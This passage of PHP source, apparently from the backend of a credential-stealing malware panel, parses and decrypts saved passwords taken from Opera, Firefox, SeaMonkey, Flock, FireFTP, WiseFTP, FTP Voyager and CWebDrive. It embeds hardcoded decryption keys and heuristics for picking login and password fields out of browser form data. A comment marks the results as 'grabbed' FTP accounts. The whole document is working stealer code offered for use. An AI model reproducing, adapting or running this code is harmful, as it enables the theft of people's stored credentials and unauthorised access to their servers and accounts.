4977. if ($pass_len != strlen($encrypted_password)-2)
4978. {
4979. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
4980. return '';
4981. }
4982.  
4983. // cut password length
4984. $encrypted_password = substr($encrypted_password, 2);
4985.  
4986. if (strlen($encrypted_password) % 8 != 0)
4987. {
4988. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
4989. return '';
4990. }
4991.  
4992. // Decrypt crypto++ hex-encoded password
4993. $iv = "\0\0\0\0\0\0\0\0";
4994. $hex_encrypted_pass = mcrypt_decrypt(MCRYPT_DES, substr($this->CWebDriveKey, 0, 8), $encrypted_password, MCRYPT_MODE_ECB, $iv);
4995.  
4996. if (!strlen($hex_encrypted_pass))
4997. {
4998. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
4999. }
5000.  
5001. $decoded_pass = hextostr($hex_encrypted_pass);
5002.  
5003. if (strlen($decoded_pass) <= 16 || strlen($decoded_pass) % 8 != 0)
5004. {
5005. $this->log->add('ERR_INVALID_HEX_STRING');
5006. return '';
5007. }
5008.  
5009. // Generate decryption check values
5010. $decryption_check_value = $this->gen_check_key($decoded_pass);
5011.  
5012. // Generate key and iv values
5013. $this->gen_key_iv($decoded_pass, $key, $iv);
5014.  
5015. $decoded_pass = substr($decoded_pass, 8);
5016.  
5017. // Complete the key
5018. $key_add = 24-strlen($key);
5019. $key .= substr($key, 0, $key_add);
5020.  
5021. // Decrypt password
5022. $plain_text = mcrypt_decrypt(MCRYPT_3DES, $key, $decoded_pass, MCRYPT_MODE_CBC, $iv);
5023.  
5024. if (!strlen($plain_text))
5025. {
5026. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
5027. }
5028.  
5029. $chk_decrypted_text = substr($plain_text, 0, 8);
5030. $plain_text = substr($plain_text, 8);
5031.  
5032. if ($chk_decrypted_text == $decryption_check_value)
5033. {
5034. if (strlen($plain_text))
5035. {
5036. $plain_text = substr($plain_text, 0, strlen($plain_text)-ord($plain_text[strlen($plain_text)-1]));
5037. return $plain_text;
5038. }
5039. }
5040. else
5041. {
5042. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
5043. }
5044.  
5045. return '';
5046. }
5047.  
5048. public function import_item($stream, $id)
5049. {
5050. switch ($id)
5051. {
5052. case 0x0000:
5053. case 0x0010:
5054. $host = $stream->read_str();
5055. $user = $stream->read_str();
5056. $pass = $this->decrypt($stream->read_str());
5057. $port = $stream->read_str();
5058. $dir = $stream->read_str();
5059.  
5060. if (($id & 0x10) > 0)
5061. $protocol = $stream->read_str();
5062. else
5063. $protocol = '';
5064.  
5065. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '4'), $port, $dir), $user, $pass);
5066.  
5067. break;
5068. default:
5069. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
5070. return false;
5071. }
5072. return true;
5073. }
5074. }
5075.  
5076. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5077. // Opera 6.x - 11.x
5078.  
5079. class module_opera extends module
5080. {
5081. private function strpos_array($array, $value_name)
5082. {
5083. foreach ($array as $substr)
5084. {
5085. if (stripos($substr[0], $value_name) !== false)
5086. {
5087. return true;
5088. }
5089. }
5090. return false;
5091. }
5092.  
5093. private function strpos_array_once($array, $value_name, $stop_words, &$out_pair)
5094. {
5095. foreach ($array as $substr)
5096. {
5097. if (stripos($substr[0], $value_name) !== false && !$this->strpos_array($stop_words, $substr[0]) && ($substr[2] == false) && strlen($substr[1]))
5098. {
5099. $substr[2] = true;
5100. $out_pair = $substr;
5101. return true;
5102. }
5103. }
5104. return false;
5105. }
5106.  
5107. private function strpos_array_any_once($array, $stop_words, &$out_pair)
5108. {
5109. foreach ($array as $substr)
5110. {
5111. if (!$this->strpos_array($stop_words, $substr[0]) && ($substr[2] == false) && strlen($substr[1]))
5112. {
5113. $substr[2] = true;
5114. $out_pair = $substr;
5115. return true;
5116. }
5117. }
5118. return false;
5119. }
5120.  
5121. private function read_site_item($stream)
5122. {
5123. $url = $stream->read_str();
5124. if (strlen($url) && $url[0] == '*')
5125. {
5126. $url = substr($url, 1);
5127. }
5128.  
5129. $login_names = array('username', 'user_name', 'user-name', 'uname', 'login-name', 'login_name',
5130. 'email', 'e-mail', 'mail', 'account',
5131. 'login', 'ogin', 'user', 'u_id', 'uid','usr',
5132. 'nickname', 'nick_name', 'name', 'nick', 'acc', 'ident', 'id');
5133. $password_names = array('password', 'pass', 'pword', 'passwrd', 'pwrd', 'pwd', 'word', 'key');
5134. $stop_words = array('sav', 'stor', 'cook', 'remem', 'auto', 'action', 'pers');
5135.  
5136.  
5137. $data_pairs = array();
5138. do
5139. {
5140. $input_name = $stream->read_str();
5141. $input_value = $stream->read_str();
5142. $input_value2 = $stream->read_str();
5143.  
5144. if ($stream->state && strlen($input_name) && (strlen($input_value) || strlen($input_value2)))
5145. {
5146. if (!strlen($input_value))
5147. $input_value = $input_value2;
5148. array_push($data_pairs, array($input_name, $input_value, false));
5149. }
5150. } while ($stream->state && strlen($input_name) && (strlen($input_value) || strlen($input_value2)));
5151.  
5152. if (count($data_pairs) < 2)
5153. return;
5154.  
5155. $found_login = false;
5156. $found_pass = false;
5157. $login_value = '';
5158. $pass_value = '';
5159.  
5160. foreach ($login_names as $login_name)
5161. {
5162. // find login value
5163. $out_pair = array();
5164. if ($this->strpos_array_once($data_pairs, $login_name, $stop_words, $out_pair))
5165. {
5166. $login_value = $out_pair[1];
5167. $found_login = true;
5168. break;
5169. }
5170. }
5171.  
5172. foreach ($password_names as $password_name)
5173. {
5174. // find pass value
5175. $out_pair = array();
5176. if ($this->strpos_array_once($data_pairs, $password_name, $stop_words, $out_pair))
5177. {
5178. $pass_value = $out_pair[1];
5179. $found_pass = true;
5180. break;
5181. }
5182. }
5183.  
5184. if (!$found_login && $found_pass)
5185. {
5186. // login value not found, but password found
5187. // retrieve first available value as login
5188. if ($this->strpos_array_any_once($data_pairs, $stop_words, $out_pair))
5189. {
5190. $login_value = $out_pair[1];
5191. $found_login = true;
5192. }
5193. }
5194.  
5195. if ($found_login && !$found_pass)
5196. {
5197. // password value not found, but login found
5198. // retrieve first available value as password
5199. if ($this->strpos_array_any_once($data_pairs, $stop_words, $out_pair))
5200. {
5201. $pass_value = $out_pair[1];
5202. $found_pass = true;
5203. }
5204. }
5205.  
5206. if (!$found_login && !$found_pass && (count($data_pairs) >= 2))
5207. {
5208. $found_login = true;
5209. $found_pass = true;
5210. $login_value = $data_pairs[0][1];
5211. $pass_value = $data_pairs[1][1];
5212. }
5213.  
5214. if ($found_login && $found_pass)
5215. {
5216. $this->add_http($url, $login_value, $pass_value);
5217. }
5218. }
5219.  
5220. public function import_item($stream, $id)
5221. {
5222. switch ($id)
5223. {
5224. case 0x0000:
5225. // site & ftp items
5226. $url = $stream->read_str();
5227. if (strlen($url) && $url[0] == '*')
5228. $url = substr($url, 1);
5229. $user = $stream->read_str();
5230. $pass = $stream->read_str();
5231.  
5232. if (str_begins($url, 'ftp://'))
5233. $this->add_ftp($url, $user, $pass);
5234. elseif (str_begins($url, 'http://') || str_begins($url, 'https://'))
5235. $this->add_http($url, $user, $pass);
5236. break;
5237. case 0x0001:
5238. // wand forms
5239. $this->read_site_item($stream);
5240. break;
5241. case 0x1000:
5242. // erroneus wands
5243. $stream->read_str(); // wand file binary data
5244. $this->log->add("ERR_OPERA_WAND");
5245. break;
5246. default:
5247. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
5248. return false;
5249. }
5250. return true;
5251. }
5252. }
5253.  
5254. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5255. // WiseFTP 1.x-7.x
5256.  
5257. class stream_wise extends stream
5258. {
5259. function read_wise_str()
5260. {
5261. if (!$this->state)
5262. return false;
5263. return $this->read_strlen($this->read_byte());
5264. }
5265.  
5266. function read_wise_uni_str()
5267. {
5268. if (!$this->state)
5269. return false;
5270. return $this->read_strlen($this->read_dword()*2);
5271. }
5272.  
5273. function read_wise_item(&$name)
5274. {
5275. if (!$this->state)
5276. return '';
5277. $name = $this->read_wise_str();
5278. $item_type = $this->read_byte();
5279. if (!$this->state)
5280. return '';
5281. if (!strlen($name))
5282. return '';
5283. switch ($item_type)
5284. {
5285. case 2:
5286. case 14:
5287. return $this->read_byte();
5288. break;
5289. case 3:
5290. return $this->read_word();
5291. break;
5292. case 4:
5293. // GUESS
5294. return $this->read_dword();
5295. break;
5296. case 5:
5297. $this->read_skip(10);
5298. break;
5299. case 6:
5300. case 7:
5301. return $this->read_wise_str();
5302. break;
5303. case 8:
5304. return true;
5305. break;
5306. case 9:
5307. return false;
5308. break;
5309. case 18:
5310. return unicode_to_utf8($this->read_wise_uni_str());
5311. break;
5312. case 20:
5313. return $this->read_str();
5314. break;
5315. default:
5316. $this->push_error('ERR_UNK_WISEFTP_ITEM_TYPE: '.$item_type);
5317. }
5318.  
5319. return '';
5320. }
5321. }
5322.  
5323. class module_wiseftp extends module
5324. {
5325. private function decrypt($encrypted_password)
5326. {
5327. $decoded_password = base64_decode($encrypted_password, true);
5328. if (!strlen($decoded_password))
5329. return '';
5330.  
5331. if (strlen($decoded_password) % 16 != 0)
5332. {
5333. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
5334. return '';
5335. }
5336.  
5337. $iv = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
5338. $cipher_key = "\x9A\xB1\x13\xEC\xFB\x2F\x74\xAE\x5A\xAE\x46\x9F\x52\x1C\xE4\xEC";
5339. $decrypted_data = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $cipher_key, $decoded_password, MCRYPT_MODE_CBC, $iv);
5340. if (!strlen($decrypted_data))
5341. {
5342. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
5343. }
5344.  
5345. $decrypted_data = substr($decrypted_data, 16);
5346.  
5347. if (strlen($decrypted_data))
5348. {
5349. // cut unused chars in last block
5350. $decrypted_data = substr($decrypted_data, 0, -(16-ord($decrypted_data[strlen($decrypted_data)-1])));
5351. }
5352.  
5353. return trim($decrypted_data);
5354. }
5355.  
5356. private function process_bin_file($file_data)
5357. {
5358. if (!strlen($file_data))
5359. return;
5360.  
5361.  
5362. $stream = new stream_wise($file_data, $this->log);
5363.  
5364. $file_id = $stream->read_strlen(4);
5365.  
5366. if ($file_id != 'TPF0')
5367. {
5368. $this->log->add("ERR_INVALID_WISEFTP_BIN_FILE");
5369. return;
5370. }
5371.  
5372. $stream->read_wise_str(); // TServers
5373. $stream->read_wise_str(); // Servers1
5374. $stream->read_wise_str(); // FTPServer
5375. $stream->read_skip(2); // Unknown
5376.  
5377. $host = '';
5378. $user = '';
5379. $pass = '';
5380. $port = '';
5381. $dir = '';
5382. $protocol = '';
5383.  
5384. while (!$stream->eof() && $stream->state)
5385. {
5386. $item_name = '';
5387. $item_value = $stream->read_wise_item($item_name);
5388.  
5389. switch ($item_name)
5390. {
5391. case 'ServerType':
5392. $protocol = $item_value;
5393. break;
5394. case 'Hostname':
5395. $host = Utf8ToWin($item_value);
5396. break;
5397. case 'Username':
5398. $user = Utf8ToWin($item_value);
5399. break;
5400. case 'Password':
5401. $pass = $item_value;
5402. if ($pass == 'your.name@your.server.com')
5403. $pass = '';
5404. break;
5405. case 'Port':
5406. $port = Utf8ToWin($item_value);
5407. break;
5408. case 'HostDirName':
5409. $dir = Utf8ToWin($item_value);
5410. break;
5411. }
5412.  
5413. if (($item_name == '' || $item_name == 'ProfileName') && $stream->state)
5414. {
5415. if ($user != 'anonymous' && $pass != 'your.name@your.server.com')
5416. {
5417. $pass = Utf8ToWin($this->decrypt($pass));
5418. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '1'), $port, $dir), $user, $pass);
5419. }
5420.  
5421. $host = '';
5422. $user = '';
5423. $pass = '';
5424. $port = '';
5425. $dir = '';
5426. $protocol = '';
5427. }
5428. }
5429. }
5430.  
5431. private function process_ini_file($file_data)
5432. {
5433. if (!strlen($file_data))
5434. return;
5435.  
5436. $parsed_ini = parse_ini($file_data);
5437.  
5438. if (!count($parsed_ini))
5439. return;
5440.  
5441. $count = assign($parsed_ini['FTPServers'][strtolower('Servers1_FTPServers.Count')]);
5442. if ($count > 0)
5443. {
5444. for ($i = 0; $i < min($count, 1000); $i++)
5445. {
5446. $host = assign($parsed_ini['FTPServers.Servers1_FTPServers'][strtolower("Item".$i."_HostName")]);
5447. $user = assign($parsed_ini['FTPServers.Servers1_FTPServers'][strtolower("Item".$i."_UserName")]);
5448. $pass = $this->decrypt(assign($parsed_ini['FTPServers.Servers1_FTPServers'][strtolower("Item".$i."_PassWord")]));
5449. $port = assign($parsed_ini['FTPServers.Servers1_FTPServers'][strtolower("Item".$i."_Port")]);
5450. $dir = assign($parsed_ini['FTPServers.Servers1_FTPServers'][strtolower("Item".$i."_HostDirName")]);
5451. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
5452. }
5453. }
5454.  
5455. $count = assign($parsed_ini['Main'][strtolower('FTPFavorites1_Items.Count')]);
5456. if ($count > 0)
5457. {
5458. for ($i = 0; $i < min($count, 1000); $i++)
5459. {
5460. $host = assign($parsed_ini['Main.FTPFavorites1_Items'][strtolower("Item".$i."_HostName")]);
5461. $user = assign($parsed_ini['Main.FTPFavorites1_Items'][strtolower("Item".$i."_UserName")]);
5462. $pass = $this->decrypt(assign($parsed_ini['Main.FTPFavorites1_Items'][strtolower("Item".$i."_PassWord")]));
5463. $port = assign($parsed_ini['Main.FTPFavorites1_Items'][strtolower("Item".$i."_Port")]);
5464. $dir = assign($parsed_ini['Main.FTPFavorites1_Items'][strtolower("Item".$i."_HostDirName")]);
5465. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
5466. }
5467. }
5468.  
5469. if (isset($parsed_ini['Main\TfrmFTPWalkerMain.mmQuickConnect']) && is_array($parsed_ini['Main\TfrmFTPWalkerMain.mmQuickConnect']))
5470. {
5471. foreach ($parsed_ini['Main\TfrmFTPWalkerMain.mmQuickConnect'] as $ftp_line)
5472. {
5473. $this->add_ftp($ftp_line);
5474. }
5475. }
5476. }
5477.  
5478. public function import_item($stream, $id)
5479. {
5480. switch ($id)
5481. {
5482. case 0x0000:
5483. // Site manager (bin files)
5484. $this->process_bin_file($stream->read_str());
5485. break;
5486. case 0x0001:
5487. // Quick connections (registry)
5488. $mru_list = $stream->read_str();
5489.  
5490. $ftp_array = explode(',', $mru_list);
5491. foreach ($ftp_array as $ftp_value)
5492. $this->add_ftp($ftp_value);
5493. break;
5494. case 0x0002:
5495. // Ini files
5496. $this->process_ini_file($stream->read_str());
5497. break;
5498. default:
5499. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
5500. return false;
5501. }
5502. return true;
5503. }
5504.  
5505. }
5506.  
5507. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5508. // FTP Voyager 11.x-15.x
5509.  
5510. class stream_voyager extends stream
5511. {
5512. function read_bytestring()
5513. {
5514. if (!$this->state)
5515. return false;
5516. $len = $this->read_byte();
5517. if ($len == 0xff)
5518. return $this->read_strlen($this->read_word());
5519. else
5520. return $this->read_strlen($len);
5521. }
5522. }
5523.  
5524. class module_ftpvoyager extends module
5525. {
5526. function tea_decrypt(&$v0, &$v1, $key)
5527. {
5528. $sum = "0xC6EF3720";
5529. $delta = "0x9e3779b9";
5530.  
5531. for ($i = 0; $i < 32; $i++)
5532. {
5533. $v1 = hexdec(gmp_strval(gmp_and(gmp_sub("$v1", (
5534. gmp_xor(gmp_add(gmp_shiftl("$v0", 4), $key[2]),
5535. gmp_xor(gmp_add("$v0", "$sum"),
5536. gmp_add(gmp_shiftr('0x'.dechex($v0), 5), $key[3]))
5537. )
5538. )),
5539. '0xffffffff'), 16));
5540.  
5541. $v0 = hexdec(gmp_strval(gmp_and(gmp_sub("$v0", (
5542. gmp_xor(gmp_add(gmp_shiftl("$v1", 4), $key[0]),
5543. gmp_xor(gmp_add("$v1", "$sum"),
5544. gmp_add(gmp_shiftr('0x'.dechex($v1), 5), $key[1]))
5545. )
5546. )),
5547. '0xffffffff'), 16));
5548.  
5549. $sum = hexdec(gmp_strval(gmp_and(gmp_sub("$sum", "$delta"), '0xffffffff'), 16));
5550. }
5551. }
5552.  
5553. function str_fix($value)
5554. {
5555. return $value[3].$value[2].$value[1].$value[0];
5556. }
5557.  
5558. private function decrypt($encrypted_password)
5559. {
5560. if (!strlen($encrypted_password))
5561. return '';
5562.  
5563. if (strlen($encrypted_password) % 8 != 0)
5564. {
5565. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
5566. return '';
5567. }
5568.  
5569. $key = "VictoriaPeterson";
5570.  
5571. $key_array = array();
5572. $key_array[] = data_int32(substr($key, 0, 4));
5573. $key_array[] = data_int32(substr($key, 4, 4));
5574. $key_array[] = data_int32(substr($key, 8, 4));
5575. $key_array[] = data_int32(substr($key, 12, 4));
5576.  
5577. $result = '';
5578.  
5579. $plain_text = '';
5580.  
5581. while (strlen($encrypted_password) > 8)
5582. {
5583. $v0 = data_int32(substr($encrypted_password, 0, 4));
5584. $v1 = data_int32(substr($encrypted_password, 4, 4));
5585.  
5586. $this->tea_decrypt($v0, $v1, $key_array);
5587.  
5588. $v0 = $this->str_fix(hextostr(str_pad(dechex($v0), 8, "0", STR_PAD_LEFT))); // bswap32
5589. $v1 = $this->str_fix(hextostr(str_pad(dechex($v1), 8, "0", STR_PAD_LEFT))); // bswap32
5590.  
5591. $result .= $v0.$v1;
5592. $encrypted_password = substr($encrypted_password, 8);
5593.  
5594. $plain_text .= $v0[0];
5595. }
5596.  
5597. return ztrim($plain_text);
5598. }
5599.  
5600. var $enable_advanced_processing_mode = false;
5601.  
5602. private function read_ftp_item($stream, $log, $processing_mode = 0)
5603. {
5604. $record_ver = $stream->read_dword();
5605.  
5606. if (!$stream->state)
5607. return false;
5608.  
5609. if ($record_ver != 72 && $record_ver != 73 && $record_ver != 74 && $record_ver != 75 && $record_ver != 67 && $record_ver != 54 && $record_ver != 61 && $record_ver != 62 && $record_ver != 70 && $record_ver != 69)
5610. {
5611. $log->add("ERR_UNK_FTPVOYAGER_VER: $record_ver");
5612. return false;
5613. }
5614.  
5615. if ($record_ver == 73)
5616. {
5617. $this->enable_advanced_processing_mode = true;
5618. }
5619.  
5620. $stream->read_bytestring(); // item name
5621. $stream->read_bytestring(); // comment
5622.  
5623. $host = $stream->read_bytestring(); // host
5624. $dir = $stream->read_bytestring(); // remote dir
5625. $user = $stream->read_bytestring(); // user
5626. $pass = $this->decrypt($stream->read_str()); // encrypted password
5627.  
5628. $stream->read_skip(16);
5629. $stream->read_bytestring(); // another stored dir
5630. $stream->read_skip(8);
5631.  
5632. $port = $stream->read_dword();
5633.  
5634. $stream->read_skip(28);
5635. $stream->read_dword(); // AccessibleFromPanel
5636. $stream->read_skip(4);
5637. $stream->read_bytestring(); // IncFilter
5638. $stream->read_bytestring(); // ExcFilter
5639. $stream->read_bytestring(); // ShortCut
5640.  
5641. $stream->read_dword(); // ShortCutMode
5642. $stream->read_dword(); // AutoLoadingType
5643.  
5644. $stream->read_skip(25);
5645.  
5646. $stream->read_bytestring(); // LocalDir
5647. $stream->read_bytestring(); // Account
5648. $stream->read_skip(2);
5649. $stream->read_bytestring(); // UploadDir (seen in 54 versions only)
5650. $stream->read_skip(1);
5651. $stream->read_dword(); // UseFreeInterpretType
5652. $stream->read_dword(); // RequireID
5653. $stream->read_dword(); // RequirePass
5654. $stream->read_dword(); // ResumeSupport
5655. $stream->read_dword(); // FEATSupport
5656. $stream->read_skip(8);
5657.  
5658. if ($record_ver > 54)
5659. {
5660. $stream->read_skip(4);
5661. }
5662. $stream->read_bytestring(); // Command
5663.  
5664. if ($record_ver > 54)
5665. {
5666. $stream->read_dword(); // TimeZone
5667. $stream->read_skip(14);
5668. if ($record_ver > 69)
5669. $stream->read_skip(4);
5670. }
5671.  
5672. $command_count = $stream->read_word();
5673. if ($command_count > 0)
5674. {
5675. $command_ver = $stream->read_word();
5676. if ($command_ver == 0xffff)
5677. {
5678. // no record type information, read it
5679. $stream->read_skip(2);
5680. $stream->read_skip($stream->read_word()); // CommandClass
5681. }
5682.  
5683. for ($i = 0; $i < $command_count; $i++)
5684. {
5685. if (!$stream->state)
5686. break;
5687. if ($i > 0)
5688. $stream->read_skip(2);
5689. $stream->read_skip(4);
5690. $stream->read_bytestring(); // Command_Name
5691. $stream->read_bytestring(); // Command_Value
5692. $stream->read_skip(12); // Command flags
5693. }
5694. }
5695.  
5696. $stream->read_dword(); // UnkFlag1
5697. $stream->read_dword(); // UnkFlag2
5698. $stream->read_dword(); // UnkFlag3
5699. $stream->read_dword(); // DownloadRetryCount
5700. $stream->read_dword(); // UploadRetryCount
5701.  
5702. $stream->read_skip(4);
5703. $protocol = $stream->read_dword(); // Protocol
5704. $stream->read_skip(16);
5705.  
5706. // Write grabbed FTP
5707. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 4), $port, $dir), $user, $pass);
5708.  
5709. if ($record_ver > 61)
5710. $stream->read_skip(4);
5711.  
5712. if ($record_ver > 62)
5713. $stream->read_skip(16);
5714.  
5715. $stream->read_bytestring(); // ProxyName
5716. $stream->read_dword(); // ProxyPort
5717. $stream->read_bytestring(); // ProxyLogin
5718. $stream->read_bytestring(); // ProxyPass
5719. $stream->read_bytestring(); // ProxyDelimiter
5720.  
5721. $stream->read_skip(40);
5722.  
5723. if ($record_ver > 62)
5724. $stream->read_skip(24);
5725.  
5726. if ($record_ver > 67)
5727. $stream->read_skip(6);
5728.  
5729. if ($record_ver > 70)
5730. $stream->read_skip(2);
5731.  
5732. if ($record_ver > 71)
5733. $stream->read_skip(8);
5734.  
5735. if ($record_ver > 72)
5736. {
5737. if ($record_ver == 73 && $processing_mode !== 0)
5738. {
5739. $stream->read_skip(4); // Some 73 versions use different file formats (bugged even in native application)
5740. } else
5741. {
5742. $stream->read_skip(12);
5743. }
5744. }
5745.  
5746. if ($record_ver > 73)
5747. {
5748. $stream->read_bytestring(); // Certitifacte
5749. }
5750.  
5751. if ($record_ver > 74)
5752. $stream->read_skip(4);
5753.  
5754.  
5755. if ($record_ver > 67)
5756. {
5757. $plugin_count = $stream->read_word();
5758. for ($i = 0; $i < $plugin_count; $i++)
5759. {
5760. if (!$stream->state)
5761. break;
5762. $stream->read_bytestring(); // Plugin
5763. }
5764.  
5765. $stream->read_dword(); // UsePlugins
5766. }
5767. $stream->read_skip(10);
5768.  
5769. $sibling_count = $stream->read_dword();
5770.  
5771. while ($sibling_count && $stream->state)
5772. {
5773. if (!$this->read_ftp_item($stream, $log, $processing_mode))
5774. return false;
5775. $sibling_count--;
5776. }
5777.  
5778. return $stream->state;
5779. }
5780.  
5781. private function process_ftp_file_twin($file_data, $quick_conn, $log, $processing_mode = 0)
5782. {
5783. if (!strlen($file_data))
5784. return false;
5785.  
5786. $stream = new stream_voyager($file_data, $log);
5787.  
5788. if ($quick_conn)
5789. {
5790. return $this->read_ftp_item($stream, $log, $processing_mode);
5791. }
5792.  
5793. $list_count = $stream->read_word();
5794.  
5795. if (!$stream->state)
5796. return false;
5797.  
5798. if (!$list_count)
5799. return true;
5800.  
5801. for ($i = 0; $i < $list_count; $i++)
5802. {
5803. if (!$stream->state)
5804. return false;
5805. $ftp_profile_type = $stream->read_word();
5806. if ($ftp_profile_type == 0xffff)
5807. {
5808. // no record type information, read it
5809. $stream->read_skip(2);
5810. $stream->read_skip($stream->read_word()); // FTPProfileClass
5811. }
5812. if (!$stream->state || !$this->read_ftp_item($stream, $log, $processing_mode))
5813. return false;
5814. }
5815.  
5816. return true;
5817. }
5818.  
5819. private function process_ftp_file($file_data, $quick_conn = false)
5820. {
5821. $this->enable_advanced_processing_mode = false;
5822.  
5823. if (!strlen($file_data))
5824. return false;
5825.  
5826. $local_log = new debug_log();
5827. $processing_result = $this->process_ftp_file_twin($file_data, $quick_conn, $local_log);
5828. if (!$processing_result)
5829. {
5830. if ($this->enable_advanced_processing_mode)
5831. {
5832. $local_log = new debug_log(); // reset log
5833. $processing_result = $this->process_ftp_file_twin($file_data, $quick_conn, $local_log, 1);
5834. }
5835. }
5836.  
5837. $this->log->import_from($local_log);
5838. return $processing_result;
5839. }
5840.  
5841. public function import_item($stream, $id)
5842. {
5843. switch ($id)
5844. {
5845. case 0x0000:
5846. // Site manager (bin files)
5847. $this->process_ftp_file($stream->read_str());
5848. break;
5849. case 0x0001:
5850. // Quick connections
5851. $this->process_ftp_file($stream->read_str(), true);
5852. break;
5853. default:
5854. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
5855. return false;
5856. }
5857. return true;
5858. }
5859.  
5860. }
5861.  
5862. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5863. // Firefox 0.x-4.x
5864.  
5865. class module_mozilla_base extends module
5866. {
5867. public function import_item($stream, $id)
5868. {
5869. switch ($id)
5870. {
5871. case 0x0000:
5872. $url = Utf8ToWin($stream->read_str());
5873. if (strpos($url, ' ('))
5874. {
5875. $url = substr($url, 0, strpos($url, ' ('));
5876. }
5877. $user = Utf8ToWin($stream->read_str());
5878. $pass = Utf8ToWin($stream->read_str());
5879.  
5880. if (str_begins($url, 'http://') || str_begins($url, 'https://'))
5881. {
5882. $this->add_http($url, $user, $pass);
5883. } else
5884. $this->add_ftp($url, $user, $pass);
5885. break;
5886. default:
5887. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
5888. return false;
5889. }
5890. return true;
5891. }
5892. }
5893.  
5894. class module_firefox extends module_mozilla_base
5895. {
5896. }
5897.  
5898. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5899. // FireFTP
5900.  
5901. class module_fireftp extends module
5902. {
5903. var $extra_params = array();
5904.  
5905. public function import_item($stream, $id)
5906. {
5907. switch ($id)
5908. {
5909. case 0x0000:
5910. $url = Utf8ToWin($stream->read_str());
5911. if (strpos($url, ' ('))
5912. {
5913. $url = substr($url, 0, strpos($url, ' ('));
5914. }
5915. $user = Utf8ToWin($stream->read_str());
5916. $pass = Utf8ToWin($stream->read_str());
5917.  
5918. if (substr($url, 0, 4) == 'ftp.')
5919. {
5920. $url = substr($url, 4);
5921. $url_orig = $url;
5922. $dir = '';
5923. $port = '';
5924. $protocol = '';
5925.  
5926. // newer versions store ftp host with assigned port, cut it as port is stored in fireFTPsites.dat configuration file
5927. if (strpos($url, ':') !== false)
5928. {
5929. $url = substr($url, 0, strpos($url, ':'));
5930. }
5931.  
5932. foreach ($this->extra_params as $extra_param)
5933. {
5934. if (assign($extra_param['host']) == $url || assign($extra_param['host']) == $url_orig)
5935. {
5936. $port = assign($extra_param['port']);
5937. $dir = assign($extra_param['dir']);
5938. $protocol = assign($extra_param['protocol']);
5939. }
5940. }
5941.  
5942. $this->add_ftp(append_port_dir(ftp_force_ssh($url, $protocol == 'ssh2'), $port, $dir), $user, $pass);
5943. }
5944. break;
5945. case 0x1000:
5946. $json_params = $stream->read_str();
5947. $json_params = json_fmt_nice($json_params);
5948. $json_result = str_replace('"{account"', '{"account"', $json_params);
5949. $json_result = json_decode($json_result, true);
5950.  
5951. if ($json_result !== null && is_array($json_result))
5952. {
5953. foreach ($json_result as $param_array)
5954. {
5955. if (is_array($param_array))
5956. {
5957. $host = assign($param_array['host']);
5958. $port = assign($param_array['port']);
5959. $dir = assign($param_array['remotedir']);
5960. $protocol = assign($param_array['protocol']);
5961.  
5962. $host = Utf8ToWin($host);
5963. $port = Utf8ToWin($port);
5964. $dir = Utf8ToWin($dir);
5965.  
5966. if (strlen($host))
5967. array_push($this->extra_params, array('host'=>$host, 'port'=>$port, 'dir'=>$dir, 'protocol'=>$protocol));
5968. }
5969. }
5970. }
5971. break;
5972. default:
5973. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
5974. return false;
5975. }
5976. return true;
5977. }
5978. }
5979.  
5980.  
5981. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5982. // SeaMonkey 1.x-2.x
5983.  
5984. class module_seamonkey extends module_mozilla_base
5985. {
5986. }
5987.  
5988. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5989. // Flock 1.x-2.x
5990.  
5991. class module_flock extends module_mozilla_base
5992. {
5993. }
5994.  
